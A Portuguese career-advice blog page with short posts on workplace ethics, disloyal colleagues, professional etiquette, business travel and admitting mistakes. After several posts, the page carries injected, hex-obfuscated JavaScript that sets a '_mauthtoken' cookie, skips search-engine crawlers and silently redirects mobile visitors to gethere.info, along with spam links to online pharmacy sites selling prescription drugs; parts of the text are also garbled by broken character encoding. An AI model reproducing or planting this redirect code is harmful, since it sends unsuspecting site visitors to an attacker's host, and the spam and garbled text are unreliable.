Alt + Shift + C ir para o conteúdo Alt + Shift + M ir para o menu Alt + Shift + B ir para a busca Alt + Shift + F ir para o rodapé

Cuidado com as práticas contrárias aos seus valores éticos

Publicado por:
05 abr

03.101

Em algum momento da carreira, o profissional pode se deparar com situações que parecem ser “atrativas” em um primeiro momento, mas que de alguma forma vão de encontro aos seus valores éticos e morais. Porém, é preciso atenção para não colocar em risco sua própria imagem e carreira a troco de um benefício imediato.

Para evitar situações como esta, antes de decidir por aceitar uma oportunidade em uma empresa, o profissional deve conhecer a cultura organizacional, sua reputação, suas práticas no mercado e avaliar se são compatíveis com as suas próprias crenças e valores. Isso porque muita coisa pode ser flexibilizada e ajustada, mas quando se trata de valores profissionais, dificilmente é possível encontrar um meio termo.

No entanto, mesmo fazendo essa análise prévia, no decorrer da carreira dentro de uma organização, podem surgir situações em que o profissional será solicitado a fazer alguma tratativa com a qual não concorde ou que fira seus valores éticos profissionais. Mas o que fazer diante desse caso?

Muitos profissionais que se deparam com uma situação como esta optam por sair da empresa quando não concordam com as práticas utilizadas, principalmente se ele próprio tiver que colaborar com elas. De fato, se você não compactua com o modelo de atuação da empresa ou do seu gestor, são poucas as opções que restam além do pedido de desligamento. Porém, é válido tentar influenciar para que as práticas sejam modificadas, antes de tomar uma decisão definitiva.

O importante é ficar atento e não entrar em situações que podem ferir os seus valores e princípios morais. Um deslize dessa natureza pode importunar sua consciência e até a sua carreira por muito tempo. Por isso, toda atenção é pouca!

Como se proteger do “fogo amigo”

Publicado por:
03 abr

03.61

No meio corporativo, é bastante comum que algumas pessoas da equipe, por razões diversas, se apresentem como aliadas, quando na verdade trabalham para atrapalhar a vida do gerente. Elas se articulam internamente para aumentar e criar dificuldades quando não há razão para isso. Mas como identificar essas pessoas e se proteger delas?

É importante entender porque isso acontece. Podem existir inúmeras razões, mas a mais comum é acreditar que para ter uma projeção profissional ou mostrar seu compromisso com o trabalho é preciso expor ou denunciar as fragilidades do seu gerente e, quando elas não encontram, precisam criar dificuldades para atrapalhar o desempenho gerencial. É uma estratégia muito utilizada por aqueles que falham no quesito competência para a função desejada.

No geral, essas pessoas agem de forma a parecerem “amigos” e parceiros, e estão sempre a postos para repassar alguma informação. Por exemplo, diante de uma dificuldade, chegam junto do gerente e repassam até certo nível da situação, o suficiente apenas para acender uma luz sobre a questão. Porém, poderiam contribuir mais, mas não o fazem. É nesta hora que podem estar trabalhando contra a gestão.

Essa é uma das evidências para conseguir perceber quando alguém está boicotando. Na prática, as informações chegam incompletas, de forma proposital, e quando o gerente menos espera é surpreendido com o seu superior já sabendo do problema, às vezes mais do que ele próprio. Ou seja, o boicotador, quando tem uma oportunidade, leva a situação diretamente para a alta gestão, passando por cima do gerente. E ainda se fazem de vítima quando a “bomba” estoura, com comentários do tipo: “Eu tentei ajudar” ou “Eu te avisei…”.

Ao se deparar com esse tipo de profissional, é importante que o gerente procure se articular com o seu superior para evitar as situações de by pass e que ele colabore no reforço ao papel gerencial, ou seja, quando for procurado, direcione o caso para ser resolvido pelo responsável, desarticulando o movimento de boicote. Alertar o superior e costurar essa aliança ajuda a enfraquecer as atuações contrárias. O gerente também deve ficar atento aos movimentos da equipe e tentar identificar em quem ele pode confiar como aliado de verdade e quais são aqueles que não merecem tanta confiança.

Cuidados com a etiqueta profissional

Publicado por:
29 mar

http://www.svnp.dk/purchase-lady-era-100mg/ 7.4estagio 1

http://mujuomija.com/2018/02/12/detrol-la-generic-substitute/ http://www.repress.co/lisinopril-10-mg-no-prescription/ Muitas pessoas ainda pensam que sA? ser competente no que faz Ai?? suficiente para garantir uma carreira bem-sucedida. PorAi??m, a experiA?ncia mostra que competA?ncia tAi??cnica nA?o Ai?? tudo, e que aqueles que nA?o demonstram uma boa etiqueta profissional, tanto dentro do ambiente de trabalho quanto nos ambientes externos, podem por em risco o crescimento na carreira.

Por isso, Ai?? preciso ficar atento a alguns aspectos do nosso comportamento no dia a dia e reduzir as chances de ai???gafesai???. SA?o cuidados com a postura, a forma de se vestir e a comunicaAi??A?o que devem ser tomados por todos dentro ou fora da empresa. Nesse contexto, alguns pontos de atenAi??A?o sA?o importantes e podem ajudar o profissional a passar uma boa imagem de si mesmo:

ai??? Mantenha uma boa apresentaAi??A?o pessoal. Esteja sempre bem vestido, com roupas discretas e apropriadas para o ambiente, evitando o excesso de maquiagem e acessA?rios e com cuidado para a higiene pessoal;

ai??? Atente para a postura ao andar e sentar e para o tom de voz e linguajar que utiliza;

ai??? Mantenha um bom relacionamento com colegas de trabalho, clientes, fornecedores, etc. Seja cordial e prestativo desde o primeiro contato e sempre ao entrar em um ambiente, peAi??a licenAi??a e cumprimente todas as pessoas presentes;

ai??? Seja organizado e demonstre isso. Mantenha sua mesa em ordem, com papAi??is e arquivos de computador nos devidos lugares, e contribuAi??a para a organizaAi??A?o dos espaAi??os conjuntos;

ai??? Tenha cuidado com as postagens nas redes sociais. Lembre-se que a partir do momento em que algo Ai?? publicado na internet, nada impede que a empresa ou outro profissional acesse a esse conteA?do. Para minimizar os transtornos, o ideal Ai?? evitar compartilhar opiniAi??es pessoais ou fotos mais descontraAi??das nas redes sociais;

ai??? A pontualidade deve ser tratada como ponto de honra. Seja pontual em todos os seus compromissos e respeite sempre os horA?rios combinados.

Em resumo, ter equilAi??brio e saber agir de forma consciente nas mais variadas situaAi??Ai??es e com todos os tipos de pessoa Ai?? um ponto que pode fazer diferenAi??a na carreira de todo profissional. Afinal, somos observados o tempo todo, e qualquer deslize pode acabar deixando uma marca negativa na sua imagem.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Como tornar as viagens de trabalho menos estressantes

Publicado por:
27 mar

http://blog.terradelfuoco.org/2018/02/cheap-dipyridamole-side/ http://ministryofhappiness.org/2018/02/nombre-generico-de-micardis/ 01.2 1

H http://mujuomija.com/2018/02/13/risperdal-acne-treatment/ oje em dia, a flexibilidade para viagens faz parte das regras do jogo corporativo. Na maioria das empresas, Ai?? comum ter um grupo de profissionais que vive de malas prontas. E um dos maiores desafios para quem enfrenta aeroportos e estradas frequentemente Ai?? nA?o deixar que essa rotina se torne um aborrecimento.

Para essas pessoas que precisam viajar a trabalho vA?rias vezes ao mA?s, algumas dicas sA?o importantes para facilitar o dia a dia. Uma delas diz respeito Ai?? bagagem. No caso de viagens curtas, o ideal Ai?? fazer uma mala compacta para evitar a necessidade de despachA?-la e ganhar tempo na chegada. TambAi??m Ai?? importante nA?o se esquecer de levar alguns itens essenciais na mala de mA?o, como computador, carregador de celular, etc. AlAi??m disso, vale a pena lembrar que os materiais confidenciais da empresa devem ser mantidos em lugar seguro e, sempre que possAi??vel, nA?o devem ser despachados.

No quesito roupas, a dica Ai?? levar peAi??as neutras que possam ser combinadas entre si, diminuindo o volume e o peso da bagagem. Optar por itens de higiene em formato travel ai??i?? tamanho menor que o original ai??i?? tambAi??m ajuda na reduAi??A?o do peso da mala e evita, no caso de viagens de aviA?o para fora do paAi??s, que os produtos lAi??quidos com mais de 100 ml sejam confiscados antes do embarque.

Quem viaja muito pode, ainda, para ganhar tempo, facilitar a prA?pria passagem no detector de metais, retirando antecipadamente objetos e acessA?rios, como cintos e calAi??ados, que possam ser bloqueados pelo equipamento e gerar um possAi??vel contratempo na hora do embarque.

Como aeroportos e rodoviA?rias sA?o lugares onde sempre hA? muita movimentaAi??A?o de pessoas, Ai?? necessA?rio que o profissional viajante atente para a discriAi??A?o e o sigilo das informaAi??Ai??es. O ideal Ai?? nA?o abrir arquivos de trabalho ou tratar de assuntos confidenciais, ter cuidado ao mandar e-mails e mensagens, para que outros nA?o vejam o conteA?do que estA? sendo escrito, e evitar falar alto, principalmente citando nomes e sobrenomes, de pessoas ou empresas.

Seguindo essas dicas, contratempos podem ser evitados deixando a rotina de viagens a trabalho mais seguras, produtiva e menos estressante para o profissional. var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Assuma seus erros e aprenda com eles

Publicado por:
22 mar

http://ministryofhappiness.org/2018/02/colospa-online-calculator/ http://blog.terradelfuoco.org/2018/02/generic-paxil-mylan/ http://mujuomija.com/2018/02/13/gsp-tracker-localizador-gps-movil/ 03.91 (1)

NinguAi??m gosta de cometer erros, principalmente porque, para muitas pessoas, errar pode significar incompetA?ncia e fracasso. PorAi??m, Ai?? preciso entender que todos nA?s corremos o risco de falhar ao longo da carreira; o grande diferencial Ai?? a postura que adotamos diante do problema.

Ai?? como diz o ditado: ai???SA? nA?o erra quem nA?o fazai???. Mesmo o profissional mais competente estA? sujeito a cometer erros em algum momento da sua carreira. O importante, nesses casos, Ai?? ter a capacidade e maturidade para reconhecer as prA?prias falhas e voltar atrA?s. Entretanto, a reaAi??A?o mais comum das pessoas Ai?? se esconder atrA?s do erro, muitas vezes por medo das consequA?ncias, e ficar esperando a ai???bombaai??? estourar, o que nem de longe Ai?? o melhor caminho.
Neste processo para aprender a lidar com os prA?prios erros, algumas liAi??Ai??es devem ser consideradas:

1. Ao identificar que errou, analise a extensA?o do problema e nA?o tente buscar justificativas. Entenda o porquA? de o erro ter acontecido e se tem como reparA?-lo;

2. Depois de avaliar o problema, assuma a responsabilidade pelo erro. A maturidade de apontar a prA?pria falha traz um efeito positivo mesmo diante de uma situaAi??A?o difAi??cil;

3. NA?o se sinta fracassado e considere o erro como experiA?ncia. Adote medidas preventivas para reduzir as chances de acontecer novamente. Afinal, Ai?? normal errar, mas viver errando pode prejudicar a carreira e a imagem profissional.

O gestor tambAi??m tem um papel importante e pode ajudar a equipe a lidar melhor com os erros. Para tanto, Ai?? preciso desenvolver uma relaAi??A?o aberta e de confianAi??a, de modo a estimular que as pessoas nA?o se sintam temerosas em expor que algo deu errado, por medo de represA?lias ou de serem julgadas como irresponsA?veis. var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== 